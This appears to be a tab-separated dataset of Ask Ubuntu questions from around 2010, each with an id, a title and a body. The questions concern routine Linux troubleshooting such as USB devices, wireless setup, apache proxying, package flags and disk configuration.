18784	mp3 player mpman ts300 not recognized	i just received a mpman ts300 mp3 player for christmas . but when i try to connect it to ubuntu ( 10.10 ) through usb it does n't seem to be recognized . i searched for a linuxdriver but came up with nothing . i even tried installing mpman manager from the software center , but still the same problem ... has anybody got any ideas about how to fix this ? thank you edit : some additional information when i plug it in , it does n't show up under /dev . and it is not listed in the result of 'lsusb' this is the output of 'dmesg' [ 19571.732541 ] usb 1-4 : new high speed usb device using ehci_hcd and address 2 [ 19571.889154 ] scsi7 : usb-storage 1-4:1.0 [ 19572.883155 ] scsi 7:0:0:0 : direct-access ts300 usb disk 1.00 pq : 0 ansi : 0 [ 19572.885856 ] sd 7:0:0:0 : attached scsi generic sg2 type 0 [ 19572.887266 ] sd 7:0:0:0 : [ sdb ] 7868416 512-byte logical blocks : ( 4.02 gb/3.75 gib ) [ 19573.012547 ] usb 1-4 : reset high speed usb device using ehci_hcd and address 2 [ 19573.292550 ] usb 1-4 : reset high speed usb device using ehci_hcd and address 2 [ 19573.572565 ] usb 1-4 : reset high speed usb device using ehci_hcd and address 2 [ 19573.725019 ] sd 7:0:0:0 : [ sdb ] test wp failed , assume write enabled [ 19573.725024 ] sd 7:0:0:0 : [ sdb ] assuming drive cache : write through [ 19573.728521 ] sd 7:0:0:0 : [ sdb ] attached scsi removable disk [ 19575.333015 ] sd 7:0:0:0 : [ sdb ] 7868416 512-byte logical blocks : ( 4.02 gb/3.75 gib ) [ 19575.452547 ] usb 1-4 : reset high speed usb device using ehci_hcd and address 2 [ 19580.603253 ] usb 1-4 : device descriptor read/all , error -110 [ 19580.722560 ] usb 1-4 : reset high speed usb device using ehci_hcd and address 2 [ 19595.842579 ] usb 1-4 : device descriptor read/64 , error -110 [ 19611.072656 ] usb 1-4 : device descriptor read/64 , error -110 [ 19611.302540 ] usb 1-4 : reset high speed usb device using ehci_hcd and address 2 [ 19616.332568 ] usb 1-4 : device descriptor read/8 , error -110 [ 19621.462692 ] usb 1-4 : device descriptor read/8 , error -110 [ 19621.692551 ] usb 1-4 : reset high speed usb device using ehci_hcd and address 2 [ 19626.722567 ] usb 1-4 : device descriptor read/8 , error -110 [ 19631.852802 ] usb 1-4 : device descriptor read/8 , error -110 [ 19631.962587 ] usb 1-4 : usb disconnect , address 2 [ 19631.962587 ] sd 7:0:0:0 : device offlined - not ready after error recovery [ 19631.962840 ] sd 7:0:0:0 : [ sdb ] assuming drive cache : write through [ 19631.965104 ] sd 7:0:0:0 : [ sdb ] read capacity failed [ 19631.965109 ] sd 7:0:0:0 : [ sdb ] result : hostbyte=did_no_connect driverbyte=driver_ok [ 19631.965112 ] sd 7:0:0:0 : [ sdb ] sense not available . [ 19631.965125 ] sd 7:0:0:0 : [ sdb ] assuming drive cache : write through [ 19631.965130 ] sdb : detected capacity change from 4028628992 to 0 [ 19632.130042 ] usb 1-4 : new high speed usb device using ehci_hcd and address 3 [ 19647.242550 ] usb 1-4 : device descriptor read/64 , error -110 [ 19662.472560 ] usb 1-4 : device descriptor read/64 , error -110 [ 19662.702566 ] usb 1-4 : new high speed usb device using ehci_hcd and address 4 [ 19677.822587 ] usb 1-4 : device descriptor read/64 , error -110 [ 19693.052575 ] usb 1-4 : device descriptor read/64 , error -110 [ 19693.282582 ] usb 1-4 : new high speed usb device using ehci_hcd and address 5 [ 19698.312600 ] usb 1-4 : device descriptor read/8 , error -110 [ 19703.442594 ] usb 1-4 : device descriptor read/8 , error -110 [ 19703.672548 ] usb 1-4 : new high speed usb device using ehci_hcd and address 6 [ 19708.702581 ] usb 1-4 : device descriptor read/8 , error -110 [ 19713.840077 ] usb 1-4 : device descriptor read/8 , error -110 [ 19713.942555 ] hub 1-0:1.0 : unable to enumerate usb device on port 4 [ 19714.262545 ] usb 4-2 : new full speed usb device using uhci_hcd and address 2 [ 19729.382549 ] usb 4-2 : device descriptor read/64 , error -110 [ 19744.612534 ] usb 4-2 : device descriptor read/64 , error -110 [ 19744.842543 ] usb 4-2 : new full speed usb device using uhci_hcd and address 3 [ 19759.962714 ] usb 4-2 : device descriptor read/64 , error -110 [ 19775.200047 ] usb 4-2 : device descriptor read/64 , error -110 [ 19775.422630 ] usb 4-2 : new full speed usb device using uhci_hcd and address 4 [ 19780.444498 ] usb 4-2 : device descriptor read/8 , error -110 [ 19785.574491 ] usb 4-2 : device descriptor read/8 , error -110 [ 19785.802547 ] usb 4-2 : new full speed usb device using uhci_hcd and address 5 [ 19790.824490 ] usb 4-2 : device descriptor read/8 , error -110 [ 19795.961473 ] usb 4-2 : device descriptor read/8 , error -110 [ 19796.062556 ] hub 4-0:1.0 : unable to enumerate usb device on port 2
18785	ubuntu moblin : there is no log in button on my web services ! please help !	problem is there are username and password fields but no log in button so i can confirm , when i try pressing enter nothing happens anyway . any solution to this matter ?
18787	how can i create an alias so that when i enter `` kt '' it executes `` killall gnome-terminal '' ?	how can i create an alias so that when i enter `` kt '' it executes `` killall gnome-terminal '' ?
18788	how to enable the shadow of the top gnome panel ?	some weeks ago i 've disabled the shadow of my top panel . and now i want to re-enable the shadow . i does n't remember how i disable the shadow , but i already know i have n't done it with compiz . so the solution with ccsm & window decoration wo n't help me . i 'm really sure i 've edited a text file and restarted the panel to drop the shadow . i 've also tried to reset the panel with gconftool-2 -- recursive-unset /apps/panel pkill gnome-panel but this also does n't work . may anyone out there help me ?
18792	how can i view or start java web start applications ?	where can i find a menu or launchers for javaws apps that i have installed ? i am using openjdk x86 .
18793	how often are packages updated in lucid ?	i 'm using ubuntu since dapper and i really love it . right now , i have three production machines running lucid with some ppas . and i do n't like this scenario since ppas apps usually make badly-made packages ( not respecting debian standards ) . i wonder how often packages hits the repository in lucid ? can we expect to see changes in universe repo ?
18796	how to debug a pcmcia-scsi adaptor issue with a slide scanner ?	i am looking for ways to debug ( or understand why things do n't work as i expect with ) the initialisation of an scsi-2 device ( microtek artixscan 4000t ) using a pcmcia adaptor ( adaptec slimscsi 1450b ) on my old p4 laptop with ubuntu 9.10 . i use vuescan as it is capable of recognising the 4000t - and the author of vuescan assures me that it should work . on insertion in my ubuntu system , the pcmcia-scsi adaptor shows as socket 0 device 0 : [ aha152x_cs ] ( bus id : 0.0 ) ( lspcmcia ) and resets the scanner , but vuescan does not detect the scanner and no device shows with lsscsi or lspci . i tried as root just in case , same story . i have also tried without success on a windows xp laptop . same as above , the adaptor is recognised by the system and the scanner gets reset on insertion of the pcmcia card , but vuescan does not see the scanner . back to ubuntu , i tried the command echo `` scsi add-single-device 0 0 ? 0 '' > /proc/scsi/scsi with 0 and 2 for ? ( having set the scsi device number on the scanner to 0 or 2 ) to no avail . with 2 it said the parameter was incorrect , with 0 it accepted but did not seem to do anything with it . /proc/scsi/scsi is always size 0 . i have tried those commands as root , and tried starting vuescan both under my regular user and as root . in every try so far with the 4000t ( and adaptec slimscsi 1450b pcmcia-scsi adaptor ) vuescan does not see any scanner . i would appreciate any lead that would help me debug or fix this issue .
18797	running apache and tomcat together on different subdomains ?	posted this on serverfault but did n't get a response . hoping i will have better luck on the ubuntu site . i have been trying to get this working the whole of today . i have a server which resolves to the domain example.com . this is running apache2 and tomcat 6 . the requirement is to direct requests to example.com to apache2 and app.example.com to tomcat . i know i have to do a virtualhost proxy pass for this to work . here are the settings on my server . /etc/hosts file looks something like this 127.0.0.1 localhost localhost.localdomain example.com app.example.com i have two virtual host files for the different domains in /etc/apache2/sites-enabled /etc/apache2/sites-enabled/example.com looks like this < virtualhost *:80 > # admin email , server name ( domain name ) and any aliases serveradmin webmaster @ localhost servername example.com serveralias www.example.com documentroot /var/www < directory / > options followsymlinks allowoverride none < /directory > < directory /var/www/ > options indexes followsymlinks multiviews allowoverride none order allow , deny allow from all < /directory > scriptalias /cgi-bin/ /usr/lib/cgi-bin/ < directory `` /usr/lib/cgi-bin '' > allowoverride none options +execcgi -multiviews +symlinksifownermatch order allow , deny allow from all < /directory > errorlog /var/log/apache2/error.log # possible values include : debug , info , notice , warn , error , crit , # alert , emerg . loglevel warn customlog /var/log/apache2/access.log combined alias /doc/ `` /usr/share/doc/ '' < directory `` /usr/share/doc/ '' > options indexes multiviews followsymlinks allowoverride none order deny , allow deny from all allow from 127.0.0.0/255.0.0.0 : :1/128 < /directory > < /virtualhost > /etc/apache2/sites-enabled/app.example.com file looks like this < virtualhost *:80 > servername app.example.com serveralias www.app.example.com proxypreservehost on proxypass / http : //localhost:8080/ proxypassreverse / http : //localhost:8080/ setenv force-proxy-request-1.0 1 setenv proxy-nokeepalive 1 < /virtualhost > mod_proxy and mod_rewrite are both enabled on the apache instance . i have a cname entry for both example.com and app.example.com . when accessing app.example.com , i get an 403 forbidden , saying i have no access to / on the server . what am i doing wrong ?
18798	gaming with ati open-source drivers	i have recently bought humble bundle 2 ( http : //www.humblebundle.com/ ) . is there a way to run braid using ati 's open-source drivers ? the game always crashes . when do get it to start in windowed mode once i go to the first level it will crash . i am using the lastest version of braid ( st3c ignored ) when i use the proprietary drivers braid works flawlessly and world of goo performance is increased . however there is terrible screen tearing with the ati propritary drivers . so my question is : how do i play braid if i want to use the proprietary drivers ?
18799	how to include applications/software in canonical partners repo ?	there seems to be no publicly documented information about how to get applications included in the canonical partners repo . how does an app/software get included there ? what are the benefits ? do apps need to pay canonical for inclusion in that repo ? ( if so , all the app dev needs to do is just pay for the service , no matter what the standard/popularity/usefulness of the app is , it gets included ? ) note : this is about applications in http : //archive.canonical.com/ubuntu repo and not the independent repo ( http : //extras.ubuntu.com/ubuntu ) which falls under the app review process .
18802	how to correctly add a custom daemon to init.d ?	i 've got a 3-rd party proprietary application server daemon which can be started and stopped by couple of command lines . i need this daemon to start when the system starts up and correctly stopped on system shutting down . how do i correctly implement this ? is it enough to copy some script inside /etc/init.d and modify it accordingly ?
18804	what do the various dpkg flags like 'ii ' 'rc ' mean ?	i frequently need to check which packages are installed , and i use the following command : dpkg -l | grep foo which gives the following output desired=unknown/install/remove/purge/hold | status=not/inst/cfg-files/unpacked/failed-cfg/half-inst/trig-await/trig-pend |/ err ? = ( none ) /reinst-required ( status , err : uppercase=bad ) ||/ name version description ii foo < version > < description > what does the ii mean ? what other flags are there ? how to read the flags ? ( because the explanation is quite complicated , imo ) thanks .
18806	why does update-mime-database complain about uri/rtspt and other unusual types ?	when running update-mime-database - usually automatically launched by apt-get - why do i reliably get complaints like : unknown media type in type 'all/all' unknown media type in type 'all/allfiles' unknown media type in type 'uri/mms' unknown media type in type 'uri/mmst' unknown media type in type 'uri/mmsu' unknown media type in type 'uri/pnm' unknown media type in type 'uri/rtspt' unknown media type in type 'uri/rtspu' unknown media type in type 'fonts/package' unknown media type in type 'interface/x-winamp-skin' it does n't seem to be hurting anything , but chronic errors during updates risk obscuring an error that i do care about .
18820	what happens when we uncomment grub_disable_linux_uuid=true ?	what happens when we uncomment grub_disable_linux_uuid=true in /etc/default/grub .
18821	rhythmbox not saving the album art permanently	i run ubuntu 10.10 and use rhythmbox ( version 0.13.1 ) regularly with the albumartsearch plugin installed . however when i change the album art it is only temporary . on moving to the next song it automatically removes the previous song 's album art cover . ( i do know about banshee but would like to use rhythmbox ) . the cover art plugin is also installed by default however it can not display some of the album covers since the songs are in my local language ( tamil ) hence it can not retrieve the album cover from the internet . however the albumartsearch plugin seems to do the job although only temporarily . any reason why it might be ? i have tried looking for other rhythmbox plugins which might be similar to albumartsearch but in vain . any help would be appreciated . i have filed a bug in the albumartsearch plugin 's website . waiting for the reply .
18824	how to fix indicator icons from being cut off ?	a friend of mine just upgraded from 9.10 to 10.04 and the icons for the indicator applets all appear cut off on both the bottom and the top . see picture above . note that the icons in the old systray/notification area on my friend 's panel all still display correctly , so it 's a problem with indicator clearly . my question : how can this be fixed ? ( i have a 10.04 system that i did a fresh install on , and i do n't have this issue , so i 'm guessing it 's an issue with upgrading . thanks .
18825	redirect only skype audio to bluetooth ?	i have bluetooth headset nokia bh-104 and bluetooth on my laptop . how can i set , that all sound from skype i can listen on headset , and all other sounds ( not from skype ) i can listen from laptop ?
18826	is it possible to `` reset '' the badblocks ?	i had a problem with a disk and ran badblocks . so now when i run : sudo dumpe2fs -b /dev/sdc1 i get a list of bad badblocks such as : dumpe2fs 1.41.11 ( 14-mar-2010 ) 192 1592 2416 3112 3552 ... but in fact , i realised that the problem came from the rack and not from the disk . i was using the rack in esata and got plenty of read errors . now i switched to usb , it 's not as fast , but no errors at all . so my question is : how do i reset the badblock list stored in the inode # 1 ( badblock inode ) ? ( of course , without reformating ! ... that 's the last thing i 'll try if i get no solution ) because apparently blocks are not at all `` bad '' , they were just reported so because the rack is faulty . many thanks in advance and merry christmas . edit : i tried to run another badblocks once the disk was connected to usb but no success : previously found bad-blocks remained . i ran : sudo badblocks -i /tmp/emptylist -s /dev/sdc1 the file /tmp/emptylist being empty so that badblocks is fed an empty list of known bad blocks . but apparently , it 's not the list of bad blocks , it is the additional list of bad blocks , which would be added to the existing ones declared in the inode # 1 . the documentation ( man ) is not very accurate about that .
18827	updates kill keyboard and mouse	i had applied all the updates available for on 23rd morning and keyboard and mouse stopped working thereafter . the updates amounted to around 230 mbs in size . i can use the keyboard to select other items in grub menu and it works upto the login prompt . i can change the console to ctrl+alt+f1 to f6 during boot up before the login screen . no response thereafter . i have set the autoloin after 10 seconds and also the notification asks me for enabling compositing . some thread advises me to remove the .gconfd folder of my home . please advise whether it is safe . i have done some customizations in ubuntu . will they be lost ? when booted in recovery mode , the screen remains blank without the options like repair packages , root shell , resume etc . btw , ctrl+alt+del reboots the blank screen . what to do now ? i thought that recovery mode boot will give me the menu of these above items .
18828	too many python processes running	i am running ubuntu 10.10 , and everything is working fine . i just checked the system monitor to see what processes run in a linux system..and noticed something strange . there were many python processes running ( status : -sleeping ) ... why is this ? also each of them seem to use a moderate amount of ram ... i used to program with python..and then i thought may be it is because of improper closing of the python program.but i restarted the laptop and checked the system monitor but with no change . i have included a screenshot of the system monitor below .
18832	how can i change dropbox 's indicator applet icon ?	after installing dropbox i was happy to see that although the installer said it would be version 0.6.7 , it actually installed dropbox 1.1.0 . this version includes the new application indicator . however , ubuntu does not ship with an icon for this by default . how can i replace the icon with a nice , monochrome icon set ?
18838	passing sed to a temporary variable	i am trying to bulk change some files in bash that have spaces and unwanted endings to their extension . for example from abc.pdf. ! ut . ! ut to abc.pdf i will show whole progress in case i made something harder than it should actually be . so at first i started with something like for file in `find /users/philippeharewood/desktop/film\ sheet\ music\ scores\ 2 *.\ ! ut.\ ! ut` ; do mv $ file `echo $ file | sed 's/\ ( . *\ ) \.\ ! \ut\.\ ! \ut/\1/'` ; done the above did not work for spaces when sending for mv so i changed to this find /users/philippeharewood/desktop/film\ sheet\ music\ scores\ 2 *.\ ! ut.\ ! ut | while read file do mv $ file `echo $ file | sed 's/\ ( . *\ ) \.\ ! \ut\.\ ! \ut/\1/'` ; done this worked almost but mv started saying an arbitrary message usage : mv [ -f | -i | -n ] [ -v ] source target mv [ -f | -i | -n ] [ -v ] source ... directory i am over thinking something ?
18842	is there a way to take influence on behavior of bash history ?	in terminal the bash history is often helpful when you are searching for a command-line that you already used . but is there a way to influence the behavior of the bash history ( i.e . which commands are saved , how long they are saved , how many are saved and so on ) ?
18843	best graphics card for ubuntu	i am trying to find a useable graphics card which has support for compiz and the unity interface .
18852	how to rename file with whitespaces in filename ?	i tried it the following way : rename 'bla bla .txt ' blabla.txt but this does n't work , what 's the correct syntax for this case ?
18857	how to display shadows behind text ?	is it possible to display shadows behind text on the gnome desktop just like in this picture ?
18859	video bug after a fresh installation	i just installed ubuntu 10.10 ( i 'm brand new to ubuntu ) on my laptop . i seem to have a video bug that i do n't know how to deal with . when the log-in screen comes up , the boxes are way off in the corner of the screen ( partially off it ) . when i enter my password , the screen goes black for a few seconds , then returns to the login screen . i can open a terminal window and enter my login info that way . when i go back to gnome ( ctrl+alt+f7 or whatever ) it shows me as `` logged in '' but i still ca n't get to the desktop . if anyone has any advice , i 'd love to hear it -- just try to use simple language , please , since i really do n't know linux at all yet ! i 'm running an averatec 3700 series : mobile amd sempron 3000+ 512 mb ddr , 80 gb hdd after looking at this question i tried going in through failsafe mode ( took me a while to figure out the hold-shift-while-booting thing > _ < ) and playing around with the resolution . setting a somewhat wider resolution did seem to fix things so that i can log into regular gnome , i think . i 'm not sure if this fix will persist , but it seems like it might !
18862	ps aux as non-root does n't show all processes	i 'm using an ubuntu 10.04 server ... when i run ps aux as root i see all processes when i run ps aux as nonroot i see just the processes of the current user after a bit of research i found the following solution : root @ m85 : ~ # ls -al /proc/ total 4 dr-xr-xr-x 122 root root 0 2010-12-23 14:08 . drwxr-xr-x 22 root root 4096 2010-12-23 13:30 .. dr-x -- -- -- 6 root root 0 2010-12-23 14:08 1 dr-x -- -- -- 6 root root 0 2010-12-23 14:08 10 dr-x -- -- -- 6 root root 0 2010-12-23 14:08 1212 dr-x -- -- -- 6 root root 0 2010-12-23 14:08 1227 dr-x -- -- -- 6 root root 0 2010-12-23 14:08 1242 dr-x -- -- -- 6 zabbix zabbix 0 2010-12-24 23:52 12747 [ ... ] my first idea was , that it got mounted in a weird way : /etc/fstab is ok and it does n't seem to be mounted in an weird way ... my second idea was , that there might be a rootkit : but it 's not a rootkit ... rkhunter tells me , that there is no rootkit installed ... i do n't know if it is since the machine got installed or came with an update . i 've just installed zabbix-agent on the machine and realized , that it did n't work properly ... i have already checked sysctl , with no result . sysctl -a | grep ps sysctl -a | grep proc i got a tip about grsecurity and googled a bit for it . dpkg shows that i 'm using the standard kernel and no grsecurity seems to be installed . also the /dev/grsec does n't exists . i 've also stopped apparmor , but there is still the same problem . dpkg shows , that libselinux1 is installed , but not the selinux package ... /selinux is empty ... is there another way , that i can check if grsecrity , selinux are running ? what could have caused such strange permissions ( 500 ) and how can i set it back to an normal level ( 555 ) ? crazy , i 've never seen something like that ... thanks in advance for any help and merry christmas : ) just to make it clear , what ps aux prints out ( as root i see all proccesses also apache , that runs under www-data ) : zabbix @ m85 : ~ $ ps aux user pid % cpu % mem vsz rss tty stat start time command zabbix 12747 0.0 0.0 9760 572 ? sn dec24 0:00 zabbix_agentd zabbix 12749 0.1 0.0 9760 872 ? sn dec24 2:13 zabbix_agentd zabbix 12750 0.0 0.0 9772 784 ? sn dec24 0:00 zabbix_agentd zabbix 12751 0.0 0.0 9772 788 ? sn dec24 0:00 zabbix_agentd zabbix 12752 0.0 0.0 9772 780 ? sn dec24 0:00 zabbix_agentd zabbix 12753 0.0 0.0 9760 608 ? sn dec24 0:01 zabbix_agentd zabbix 32067 0.0 0.0 35864 1360 pts/0 s 00:54 0:00 su - zabbix zabbix 32068 11.0 0.3 25096 6980 pts/0 s 00:54 0:00 -su zabbix 32094 0.0 0.0 15188 1152 pts/0 r+ 00:54 0:00 ps aux zabbix @ m85 : ~ $ jmw @ m85 : ~ $ jmw @ m85 : ~ $ ps aux user pid % cpu % mem vsz rss tty stat start time command jmw 32361 0.0 0.0 15188 1156 pts/0 r+ 00:57 0:00 ps aux jmw @ m85 : ~ $
18863	how to delete files bypassing trash	when i select the file and push delete this file is automatically landing in the trash . how can i delete files bypassing trash without using a mouse ?
18867	which tool to crop a portion of the screen ?	i can see how to use gimp to crop part of an image in a image file , but i want to crop a portion of the screen . how do you do that ?
18873	how to safely update the ati propietary drivers ?	i 'm currently using the ati drivers supplied by ubuntu , but i want to install the newest drivers ati released , i had a bad experience updating the drivers by just downloading them and runing the file , is there a safe way to install new drivers ? also , i added the xupdates ppa , does this ppa updates my drivers automatically ?
18877	how can i get wireless working on an hp-mini 110-3150 ?	i just got an hp mini 110-3150 , and booting from an external hard disk with ubuntu 10.10 works all fine , except that there is no wireless detected . i noticed that the wireless indicator is red under ubuntu , but is enabled under whatever windows 7 i got on it . so , i understand that it may not get detected at all by ubuntu at startup time , and there is no manual switch that i can simply slide to turn on/off . how can i get the wireless device turned on by default at startup time , and is there any special driver i need to install ( proprietary or not ) to get it working ? merci : - ) update : when actually installing on the computer , as a new install , the nic is not detected at first , but upon restarting , i get a notification of a closed driver available for the wireless . once installed , updated and restarted , it works fine .
18881	ca n't configure wireless now that wpa2 is enabled !	i had removed network-manager as soon as i installed ubuntu 10.04 . earlier i used to do the following to connect ( successfully ) on command line : iwconfig eth2 essid nasa dhclient eth2 now that wpa2 encryption is enabled , i tried this , but failed : iwconfig eth2 essid nasa key hunter2 dhclient eth2 with error : error for wireless request `` set encode '' ( 8b2a ) : invalid argument `` hunter2 '' where am i going wrong ? lspci gives : 02:00.0 network controller : broadcom corporation device 4727 ( rev 01 ) lshw -c network gives : *-network description : wireless interface product : broadcom corporation vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:02:00.0 logical name : eth2 version : 01 serial : 78 : e4:00:2e:54:28 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=wl0 driverversion=5.60.48.36 ip=192.1.0.20 latency=0 multicast=yes wireless=ieee 802.11 resources : irq:17 memory:56000000-56003fff edit 1 : as suggested by cyrex , i tried wpa directions given in : http : //ubuntuforums.org/showthread.php ? t=571188 in the command : sudo wpa_supplicant -d wext -i eth2 -c /etc/wpa_supplicant.conf i used wext as the driver . when i run this command , the following happens : trying to associate with 00:24 : b2:39 : f4 : c6 ( ssid='nasa ' freq=2462 mhz ) ioctl [ siocsiwap ] : device or resource busy association request to the driver failed associated with 00:1b:2f : a8 : da : cc wpa : key negotiation completed with 00:1b:2f : a8 : da : cc [ ptk=tkip gtk=tkip ] ctrl-event-connected - connection to 00:1b:2f : a8 : da : cc completed ( auth ) [ id=0 id_str= ] i tried both his wpa1 and wpa2 stuff . in either case iwconfig eth2 gives encryption key : off .
18882	unable to use unity	i use ubuntu 10.10 and i 've been shifting back and forth between the desktop and the netbook remix versions . now i ca n't find the unity interface on unr . it still shows as `` installed '' on the software center . logging back and logging in on any other mode , gives me the same interface . any ideas ?
18883	ide for libpurple ( pidgin ) ?	i 'm interested to develop an app using pidgin & libpurple , but how can i `` import '' the code to some ide that manages gtk ? someone use/is aware of one like that ?
18886	ubuntu one music app/subsonic and mp3 tag issues	i downloaded the ubuntu music app for android ( running v.2.2 ) and all was going well ... i had no problems uploading a couple albums to my `` cloud '' and then accessing them in the music app , but suddenly it seems like the app wo n't read the tags on my files and every new file is classified as `` unknown artist '' on `` unknown album '' even though i have double checked that the files were tagged correctly . is this a known problem ? is any format of tagging specifically not supported ?
18888	how to remove cd/dvd image from virtual media manager in virtualbox ?	i had a dvd image attached to virtualbox via virtual media manager and had it deleted from my harddrive without removing or `` releasing '' it from virtual media manager . now the image is still shown in virtual media manager but the remove and release options are greyed out . is there a way to get rid of the image shown in virtual media manager ? thanks in advance ! ysn
18889	how to archive/play dvd with menus and all to disk ?	i 'd really like to copy all my dvds to disk for convenience access , since i prefer browsing my filesystem to fiddling with disks . all solutions i 've found yet ( like dvd : :rip ) re-encode the contents and need complex manual steps . this question about vobs also makes me wonder whether this is possible at all . is there a good dvd archival-to-/play-from-hdd tool that allows storing the dvd 's content losslessly ? if not , what are the technical hurdles to such a thing ?
18897	enable only 802.11b/g in a 802.11n in atheros wireless card	i sometimes connect to a defective wireless ap in my office , whose 802.11n is somehow faulty . my maverick netbook has an atheros ar9285 wireless , which supports 802.11n and wants to connect the ap with 802.11n , failing . i managed to fix the thing in windows by disabling the 802.11n mode and enabling only 802.11b/g . is there a way to do the same in maverick ?
18898	how to get non-delayed sound and voip working in etqw ?	the sound in enemy territory : quake wars used to work fine before , except that using the voip hotkey would crash it outright . now , after some fiddling , i at first had sound that was delayed by half a minute , and now no sound at all . does anyone have tips on how to get voip working ?
18900	should i align partitions on an ssd , if so how do i do it at install time ?	i just bought a new ssd ( ocz vertex 2 ) and plan to do a clean install of maverick on it ( /home is on a separate hdd ) . i read that it is wise to align ssd partitions . what advantages does it truly bring to have an aligned partition on a ssd ? and how do i create an aligned ext4 partition for the new ssd during the installation of ubuntu 10.10 ?
18901	recommended storage scheme for home server ? ( lvm/jbod/raid 5 ... )	are there any guidelines for which storage scheme ( s ) makes most sense for a multiple-disk home server ? i am assuming a separate boot/os disk ( so bootability is not a concern , this is for data storage only ) and 4-6 storage disks of 1-2 tb each , for a total storage capacity in the range 4-12 tb . the file system is ext4 , i expect there will be only one big partition spanning all disks . as far as i can tell , the alternatives are individual disks pros : works with any combination of disk sizes ; losing a disk loses only the data on that disk ; no need for volume management . cons : data management is clumsy when logical units ( like a `` movies '' folder ) are larger than the capacity of any single drive . jbod span pros : can merge disks of any size . cons : losing a disk loses all data on all disks lvm pros : can merge disks of any size ; relatively simple to add and remove disks . cons : losing a disk loses all data on all disks raid 0 pros : speed cons : losing one drive loses all data ; disks must be same size raid 5 pros : data survives losing one disk cons : gives up one disk worth of capacity ; disks must be same size raid 6 pros : data survives losing two disks cons : gives up two disks worth of capacity ; disks must be same size i 'm primarily considering either lvm or jbod span simply because it will let me reuse older , smaller-capacity disks when i upgrade the system . the runner-up is raid 0 for speed . i 'm planning on having full backups to a separate system , so i expect the extra redundancy from raid levels 5 or 6 wo n't be important . is this a fair representation of the alternatives ? are there other considerations or alternatives i have missed ? and what would you recommend ?
18903	how to enable trim ?	i know that the linux kernel supports trim as of version 2.6.33 , so there should be trim support in ubuntu . is trim enabled by default or do i need to change some settings or install additional software for it to work ? if so , how ?
18910	banshee displayed in song menu but does not show currently playing song	i am using ubuntu 10.10 and am currently trying out different players . i started with the default player ( rhythmbox ) however ran into issues..click here to view it . so i then decided to try out banshee ( v1.9.1 ) which worked perfectly getting all my album covers and nicely integrating with the sound menu . however few hours later , banshee is still shown in the sound menu but when it plays a song it does not update the sound menu . it can be seen in the screenshot below . as you can see the song is being played at the moment but in the sound menu the play buttons and song are not displayed . so indeed the sound menu plugin for banshee is installed by default . also when i click the close button , banshee closes completely , normally it does close but the song plays in the background and can be controlled via the sound menu . to completely close it i had to click ctrl + q . it was working all perfectly and then suddenly i have this issue . i have no idea on where to start troubleshooting..can anyone help me ? to answer the comments and answers below , restarting did not help . from v1.9.1 banshee made the sound menu plugin as a core plugin which is thereby installed by default and enabled . however for some reason i do not see this plugin in my extensions list . i tried reinstalling it two times and purging all configuration files but still have the same problem . i restarted after every install and uninstall of banshee . although i must say this , before i unchecked certain extensions like the ipod/ipad extension ( however not the sound menu extension ) and those choices that i made were visible even when i uninstalled and installed banshee again . i have a feeling that the old configuration files of banshee were not completely purged . is there a way to purge banshee completely ? i mean everything and do a clean install of banshee in the hope that this solves the problem ?
18912	how do i removed the keyring popup when i am accessing vino ?	i am running xubuntu . i was running headless fine before using tightvnc on windows and vino on xubuntu . now , after entering the password on the remote server , the following dialog pops on the local server ( the one that usually do n't have a monitor ) before open the connection : why is that dialog showing ? how do i get ride of it ?
18915	how to connect to dsl modem using pppoe ?	i am connecting to the internet through a pppoe connection , but for some reason i can not connect to my modem ( it 's address is 192.168.1.1 ) . before i set my pppoe connection , i could connect . so , is there a way ? edit the output of ifconfig is : r @ plavizec : ~ $ ifconfig eth0 link encap : ethernet hwaddr 00:13 : d4 : f7:02 : d4 inet6 addr : fe80 : :213 : d4ff : fef7:2d4/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:2811 errors:0 dropped:0 overruns:0 frame:0 tx packets:2801 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:2538831 ( 2.5 mb ) tx bytes:448591 ( 448.5 kb ) interrupt:21 base address:0xa000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:28 errors:0 dropped:0 overruns:0 frame:0 tx packets:28 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:1600 ( 1.6 kb ) tx bytes:1600 ( 1.6 kb ) ppp0 link encap : point-to-point protocol inet addr:92.229.42.177 p-t-p:213.191.64.59 mask:255.255.255.255 up pointopoint running noarp multicast mtu:1492 metric:1 rx packets:2794 errors:0 dropped:0 overruns:0 frame:0 tx packets:2741 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:3 rx bytes:2476277 ( 2.4 mb ) tx bytes:381240 ( 381.2 kb )
18916	setting up ad hoc wifi connection	i am connected to internet via a usb evdo interface on my laptop . i am trying to setup an ad-hoc connection so that i can use internet on my smart phone as well . for this i clicked on network manager applet and then create new wireless connection after setting up connection i started to receive notifications in loop with a delay of 2/3 sec : [ connection name ] connection established [ connection name ] disconnected ... . my wifi adapter info as by lspci 05:00.0 network controller : intel corporation wifi link 5100 how to deal with this issue ?
18919	is a 40gb ssd practical to use for ' / '	i was lucky enough to be given a 40 gb ssd as a christmas gift ; and , given the inherent speed of these drives , decided it would be best used as the / partition ; but then it occurred to me that this might not be enough space . the plan i have in mind is : 40gb ssd - / 1tb hdd - /home i 'm not quite sure about where to put swap , but i 'm toying with the idea of keeping that in ram ( if it 's feasible ) , or on the hdd ( if ram is n't feasible ) . i guess my question is three-fold : is a 40gb ssd practical for use as / ? if it 's not practical , is ubuntu ( it 'll be 10.10 ) able to use the extra space on the hdd ? ... as an after-thought : is it possible to separate / out at all ? so that /etc/ and /var ( for example ) are on different drives ? ( since /var/www/ is , to me , more closely related to the contents of /home than anything else ) .
18920	any way to get a fresh ubuntu desktop without re-installing ?	i do n't want to wipe my hard drive . i just want to get rid of all the extra software i 've installed over time , and return to a prisitine , default system .
18926	how to control gnome 's auto mounting capabilities	how to control gnome 's auto mounting capabilities ? whenever i have a gnome session opened ( does n't apply when no x session is active ) some actions are taken when a cd-rom is inserted or a usb drive is attached . where 's the configuration for that ?
